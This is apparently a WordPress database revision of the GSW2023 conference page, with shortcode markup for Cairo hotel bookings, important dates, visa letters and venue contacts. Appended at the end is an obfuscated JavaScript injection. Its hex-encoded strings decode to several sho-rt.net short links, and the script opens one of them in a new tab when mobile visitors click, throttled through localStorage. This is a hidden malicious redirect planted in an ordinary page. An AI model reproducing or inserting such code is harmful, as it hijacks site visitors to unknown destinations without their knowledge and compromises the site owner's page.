css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:23:15','2023-08-16 